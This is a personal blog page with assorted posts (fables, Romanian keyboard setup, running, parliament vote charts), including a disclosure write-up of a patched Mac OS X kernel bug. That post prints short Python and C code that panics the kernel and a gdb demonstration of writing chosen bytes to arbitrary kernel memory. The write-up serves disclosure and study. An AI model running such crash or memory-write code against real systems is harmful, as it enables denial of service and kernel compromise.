Razvan ME

The Man and the Stone

Æsop was sent one day by his master Xanthus to see what company were at the public bath. He saw that many who came stumbled, both going in and coming out, over a large Stone that lay at the entrance to the bath, and that only one person had the good sense to remove it. He returned and told his master that there was only one Man at the bath. Xanthus accordingly went, and, finding it full of people, demanded of Æsop why he had told him false. Æsop thereupon replied that only he who had removed the Stone could be considered a man, and that the rest were not worthy the name. — The Book of Fables (John B. Alden, Publisher, New York, 1885)

Cum scriu eu românește în MacOS și Linux

Pe scurt, folosesc o tastură US și schimb pe aranjamentul primar din standardul SR-13392:2004 folosind tasta Alt în MacOS și tasta Windows în Linux.

Instrucțiuni de instalare:

Povestea mai lungă e următoarea. Eu am început să scriu regulat cu diacritice prin 2008 după ce am citit un post de pe blog-ul lui Vivi. Pe atunci (ca și acum de altfel) foloseam aproape în exclusivitate MacOS pentru chat. Nici una din mapările implicite sau cele oferite de Sorin Paliga nu m-au mulțumit. Ce vroiam eu era să folosesc standardul primar dar fără să trebuiască să tot schimb între tastaruri. Din fericire în MacOS editarea tasturilor se poate face ușor folosind Ukelele.

Pentru multă vreme nu am avut mare nevoie de suport pentru diacrice și în Linux. Abia vara asta, după un alt post de-al lui Vivi, am replicat layout-ul care îl foloseam în MacOS și în Linux. Inițial am încercat să fac să meargă tasta Alt dar din păcate asta intră în conflict cu prea multe programe așa că am ales tasta Windows în locul ei.

The Books

I like Valentine’s Day. I think it’s useful to have a day set aside to celebrate the love for somebody else. In general, I find useful to spend time and think about the people and the things that make my life nicer and enjoyable. A week ago, while unpacking the last boxes from the relocation, I realized, once again, how much I love the books I have. I truly do. Their shape, their texture, the way they smell, the old yellow pages of some of them, the elegance of the type from others, the memories of the time I spend reading some of them… all these small and big things make all them dear to me. Some are old and need to be handled with great care. Some are safely protected by well-made hardcovers. Some are shiny and untouched. Old friends, good friends, new friends. All are living peacefully, sharing a rack near the window. They don’t fight for my attention. They are waiting patiently for the time I don’t yet have. At some point I will.

The Server

Today I had to assemble one more rack in order to finally unpack the last round of boxes. In the process of placing it I had to turn off puppy, my home server. Unfortunately, the power supply started again to misbehave. As before, I open it up and blow the dust. The good news is that, after a few hiccups, it started working again, but the sounds I heard do not predict a very bright future. So I had to spend the some time to find and order a new power supply. While doing all these I realized something rather unexpected: that I wanted to be a father; I wanted a kid that is old enough to know how to use a computer and passionate about it to the extend of wanting to learn more about it. And I would have like to have the chance to give him (or her) a server. A machine that he could do whatever he want: use it, learn it, experiment with it, break it, fix it, take care of it. A machine that will, piece by piece, die, perhaps teaching him something useful in doing this. I know that this will probably not make sense some time for now. Everything is moving to the cloud and less and less people are willing to go through the hassle of managing their own machines. But we are not there yet and, in the same way some people like to fix their own cars, motorcycles, bikes or houses, there will be some that will also enjoy trusting their own servers.

I hope that among the parents that try to give their children the best opportunities to discover their talent for arts and science there will be some that will give them a server to play.

The Zen Master (fictional portrait)

The Zen Master is by far the most remarkable patron of the late gym hours. As expected, the master is the epitome of grace and equilibrium. The master doesn’t come too late or too early and is neither staying too long or too short. The right measure is something deeply embedded in almost everything the master does. The taste in clothing is refined and the few pieces of the gym attire are always pleasantly matched in both shape and color.

The content of the training is tough, but not too tough, and very well organized. The beginning starts on the mat (same place each time) and it contains a healthy assortment of stretches followed by an intense set of several types of crunches. This last item is of particular importance because the master is also known as The Super Cruncher (not to be confused with another type of crunchers popular in some circles) due to the perfect technique employed in performing them. Next is a lap of walking followed by running. How many laps? Five (half a mile) is the magic number. The speed is much faster than one mile per minute but distinctively slower than a sprint. The running style is another distinctive feature of the master which sports an impeccable and elegant stride. Another lap of walking and another half a mile concludes half of the whole program. The very end is typically reserved for a vigorous series of jumps. Only after this the right amount of effort was properly achieved.

In accordance with the rules of perfect harmony the master is never in a rush and the main parts are separated by brief breaks, usually including a walk to the water fountain. Like many other people the master is also using a portable audio player but, unlike many, this is never allowed to perturb the focus on the main activity.

The master is a young blonde girl which never smiles. Her outstanding perseverance is inspiring and it will surely serve her well in the future.

Summary of the Baltimore Running Festival 2009

Today I run the Half Marathon from the Baltimore Running Festival. My finish time was 2:04:50 which placed me on the overall position 2895 out of 7815 (around the top 37% mark). In the Males 30-34 section I’m probably deeper in the bottom half though. :P The average time per mile was 9:32 was better than I expected. One reason might be the fact that going downhill more than compensated the slowdown accumulated on the uphill sections.

I just eat and not I’m heading to bed for some rest so here some quick observations.

Good stuff:

  • finishing the race faster than I expected
  • the combination of overcast and some showers made the race very enjoyable (and very Baltimore-style too :P)
  • the random people cheering in various places
  • the downhills! Until now I had now idea that I actually like them. :-)
  • the gummy bears. In a few places gummy bears were offered to the runners. Beside being a funny thing in general it was even funnier so see them forming a trail on the running route. Cute!
  • the meal (the regular breakfast I have each) I had when I got home tasted better than ever.

Not so nice stuff:

  • the places with the Gatorade drinks smelled like some medicine to me
  • the smell of the portable rest rooms. There is not much to get things better I guess though. I have to say that I made a stop for one after about 6 miles and after that it was great.
  • the blisters I got on my right foot. It was from a callus but it never gave me such problems before. Ignoring it was not wise though. Lesson learned.
  • the last mile was much harder than I expected
  • the heavy dizziness from the end due to the hard stop. There were so many people at the end that was impossible not to stop though.
  • I lost about 1kg.

Some random stuff:

  • people stopping at Clifton Park to take a leak in the nature. Considering the smell of the alternatives I cannot blame them.
  • no “Keep Plucking that Chicken!” cheering. I would have loved to hear this one. The explanation of the phrase would have made it perfect for anything after 6 miles. Especially for the last one. :-)

Parlamentul României vs Congresul SUA

Continuând pe direcția din postul precedent iată niște grafice care arată prezența la vot la cele două camere ale parlamentului alături de cele două camera ale congresului SUA.

   

Diferența între cât de serioase sunt lucrurile la noi și la ei e evidentă. Un lucru interesant de notat e dimensiunea similară a camerelor (332/132 la noi, 443/103 la ei) cât și numărul de runde de votare (477/299 la noi, 686/270 la ei). Situația numărului de zile lucrate e ceva semnificativ mai diferită (31/35 la noi, 96/80 la ei). Deci membrii congresului SUA au mai multe zile lucrătoare, o țară seminificativ mai mare și reușesc să nici nu lipsească aproape de loc. În aproape 20 de ani de non-comunism se pare că mai avem mult până să facem lucrurile cum trebuie.

Nu am comparat încă datele cu cele de la Vivi așa că s-ar putea ca graficele să nu fie foarte exacte.

Notă: senatul SUA are doar 100 de senatori. Numărul de 103 e din cauza schimbărilor care au mai avut loc. Același lucru e valabil și pentru camera reprezentanților unde numărul e de 441.

Inspirat de Harta Politicii a lui Vivi iată un grafic care arată situația numărului de voturi exprimate în Camera Deputaților în 2009 până la data de 23 iunie 2009. Fiecare deputat are rezervată o linie orizontală. Numărul mare din dreapta reprezintă numărul total de voturi exprimate. Numărul cu “max” în față indică numărul maxim de voturi care ar fi putut fi exprimate iar procentul reprezintă cât la sută din voturile disponibile au fost exercitate. Ce e interesant e că PNL-ul ar fi putut să exercite mai multe voturi decât PSD+PC dacă s-ar fi dus la vot. Chiar dacă asta nu ar fi influențat semnificativ votul ar fi fost o realizare remarcabilă de care ar putea să fi fost mândri. :-)

Notă: voturile includ toate voturile exprimate. Apartenența politică este determinată de  ultimul vot exprimat (deci cifrele din dreapta sunt aproximative).

Inspirat de Harta Politicii a lui Vivi iată un grafic care arată situația numărului de voturi exprimate în Camera Deputaților în 2009 până la data de 23 iunie 2009. Fiecare deputat are rezervată o linie orizontală. Numărul mare din dreapta reprezintă numărul total de voturi exprimate. Numărul cu “max” în față indică numărul maxim de voturi care ar fi putut fi exprimate iar procentul reprezintă cât la sută din voturile disponibile au fost exercitate. Ce e interesant e că PNL-ul ar fi putut să exercite mai multe voturi decât PSD+PC dacă s-ar fi dus la vot. Chiar dacă asta nu ar fi influențat semnificativ votul ar fi fost o realizare remarcabilă de care ar putea să fi fost mândri. :-)

Notă: voturile includ toate voturile exprimate. Apartenența politică este determinată de ultimul vot exprimat (deci cifrele din dreapta sunt aproximative).

The Story of a Simple and Dangerous Kernel Bug

Among other things, the update for Mac OS X 10.5.8 also fixed an interesting kernel bug related to the way the fcntl call is handled. The bug was identified as CVE-2009-1235 and the first exploit seems to be from June 2008. The variant that I discovered is much simpler and is, as far as I know, the one that really convinced Apple to solve the issue. :-) The oldest kernel I was able to test the problem was Darwin 8.0.1 which corresponds to Mac OS X 10.4 “Tiger”. The Tiger was announce in June 28, 2004 but was released to the public on April 29, 2005 and it was advertised as containing more than 200 new features. The bug was closed on August 5, 2009 so the number of days the vulnerability was alive was 1599 days (4 years and 3 months).

Here is a way to trigger a kernel panic using Python:

import termios, fcntl
fcntl.fcntl(0, termios.TIOCGWINSZ)

The first paramter to fcntl.fcntl indicates a file descriptor and any open one (0 to 4 in Python) will work.

The C variant is also very simple (it even fits in a tweet!):

#include <fcntl.h>
#include <sys/ioctl.h>

int main()
{
        fcntl(0, TIOCGWINSZ, 0);
        return 0;
}

As expected, this code will also generate a kernel panic when the first parameter for fcntl is 1 (stdout) or 2 (stderr).

Let’s now take a better look at what really happens. First, here is the correct version of the program:

#include <stdio.h>
#include <sys/ioctl.h>

int main()
{
        unsigned short buff[4];
        ioctl(0, TIOCGWINSZ, &buff);
        printf("%d %d %d %d\n", buff[0], buff[1], buff[2], buff[3]);
        return 0;
}

What the code does is obtaining the windows size. TIOCGWINSZ and other terminal related ioctl are fully explained in tty(4).

The output of the above program is the following:

24 80 484 316

The first two numbers are the height and length of the window in characters and the second is the same in pixels. The first parameter for ioctl is also a file descriptor and the above output is also obtained for 1 (stdout) and 2 (stderr). The size in pixels depends on the terminal program (in mrxvt 0.4.1 the two numbers are always zero).

Comparing the two programs it’s obvious that the buggy one is erroneously using fcntl instead of ioctl. As incredible as might sound, I managed to do this by mistake. :P This should (obviously) not generate a kernel panic. The good news is that debugging a Darwin kernel is quite easy because Apple is providing Kernel Debug Kits which contains the debug symbols for all the shipped kernels together with some handy gdb macros. The fact that debug takes places over Ethernet is another useful thing. Investigating the call traces of the good and buggy program are like this:

(buggy) unix_syscall --> fcntl_nocancel -------------------> VNOP_IOCTL --> cptyioctl --> ttioctl
(non-buggy) unix_syscall --> ioctl --> fo_ioctl --> vn_ioctl --> VNOP_IOCTL --> cptyioctl --> ttioctl

So both calls end up in the same place but taking slightly different paths. The end point in /bsd/kern/tty.c is the following:

963          case TIOCGWINSZ:                /* get window size */
964                  *(struct winsize *)data = tp->t_winsize;
965                  break;

The problem is the data in the buggy case is whatever we give as a third parameter in the fcntl code. Considering that the 8 bytes are controlled by the user it means he can write that amount of information anywhere in the kernel memory! Pretty scary right? :-) A way to really show this is to overwrite some memory that is not used and the examine the region to see if it contains the right thing. Below is an example that is using iso_font for this. Here are the steps (ten is the name of the target machine and it’s a G4 running 10.4.7):

(gdb) attach ten
Connected.
(gdb) print &iso_font
$1 = (unsigned char (*)[4096]) 0x433268

So iso_font is located at 0x433268.

(gdb) x/4hx iso_font
0x433268 <iso_font>:    0x0000  0x0000  0x0000  0x0000

And as expected, the first 8 bytes are zero.

(gdb) c
Continuing.

Next I run the buggy code with the 0x433268 as the third parameter. The program was this:

#include <fcntl.h>
#include <sys/ioctl.h>

int main()
{
        fcntl(0, TIOCGWINSZ, 0x433268);
        return 0;
}

When I run this the system didn’t crash. What I did next was to crash it (using 0xdeadbeaf as the third parameter for the fcntl call) in order to be able to take another look at iso_font. Here is what I saw:

Program received signal SIGTRAP, Trace/breakpoint trap.
0x002bdd44 in ttioctl (tp=0x2292a04, cmd=1074295912, data=0xdeadbeaf
    <Address 0xdeadbeaf out of bounds>, flag=0, p=0x21b7b18) at
    /SourceCache/xnu/xnu-1228.12.14/bsd/kern/tty.c:964
warning: Source file is more recent than executable.
964                     *(struct winsize *)data = tp->t_winsize;
(gdb) x/4hx iso_font
0x433268 <iso_font>:    0x0018  0x0050  0x01e4  0x013c
(gdb) print tp->t_winsize
$2 = {
  ws_row = 24,
  ws_col = 80,
  ws_xpixel = 484,
  ws_ypixel = 316
}

So the iso_font was indeed changed in the expected way. :-)

To make this disclosure full: I discovered the kernel panic in August 2008. I wrote to Apple but the only reply I got was indicating that they are investigating the problem. In July 2009 I finally spent some time and debug the problem. After I found that it could be used to write arbitrary data in memory I wrote again to Apple. This time they wrote back asking me if I want to be credited in the Security Update. They kept their promise. :-)

About 3 weeks ago, working on smallworld. Things looked a little different then.

About 3 weeks ago, working on smallworld. Things looked a little different then.

This is the first time I got this in Safari. The strange thing is it was a link from Wikipedia. :P

This is the first time I got this in Safari. The strange thing is it was a link from Wikipedia. :P

At 30 a man should know himself like the palm of his hand, know the exact number of his defects and qualities, know how far he can go, foretell his failures - be what he is. And, above all, accept these things. - Albert Camus
Page 1 of 23